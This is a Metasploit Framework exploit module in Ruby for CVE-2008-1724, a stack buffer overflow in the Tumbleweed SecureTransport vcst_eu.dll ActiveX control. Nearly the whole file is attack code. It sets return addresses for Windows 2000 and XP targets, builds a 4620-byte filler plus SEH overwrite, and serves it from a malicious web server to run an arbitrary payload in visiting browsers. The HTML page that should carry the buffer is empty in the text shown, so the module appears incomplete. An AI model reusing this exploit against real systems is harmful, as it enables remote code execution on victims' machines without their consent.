## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the vcst_eu.dll FileTransfer Module (1.0.0.5) ActiveX control in the Tumbleweed SecureTransport suite. By sending an overly long string to the TransferFile() 'remotefile' function, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => 'patrick', 'References' => [ [ 'CVE', '2008-1724' ], [ 'OSVDB', '44252' ], [ 'URL', 'http://www.aushack.com/200708-tumbleweed.txt' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0<>()\"\\", }, 'Platform' => 'win', 'Targets' => [ # Patrick - tested successfully against W2KSP0 EN, W2KSP4 EN, XPSP0 EN, 2007/08/17. [ 'Universal vcst_eu.dll', { 'Ret' => 0x1001ee75 } ], [ 'Windows 2000 Pro English', { 'Ret' => 0x75022ac4 } ], [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ], ], 'DisclosureDate' => 'Apr 07 2008', 'DefaultTarget' => 0)) end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Randomize some things vname = rand_text_alpha(rand(100) + 1) vurl = rand_text_alpha(rand(100) + 1) vhostName = rand_text_alpha(rand(100) + 1) vlocalFile = rand_text_alpha(rand(100) + 1) vMD5 = rand_text_alpha(rand(100) + 1) # Build the exploit buffer filler = rand_text_alpha(4620) seh = generate_seh_payload(target.ret) sploit = filler + seh # Build out the message content = %Q| | print_status("Sending #{self.name}") # Transmit the response to the client send_response_html(cli, content) # Handle the payload handler(cli) end end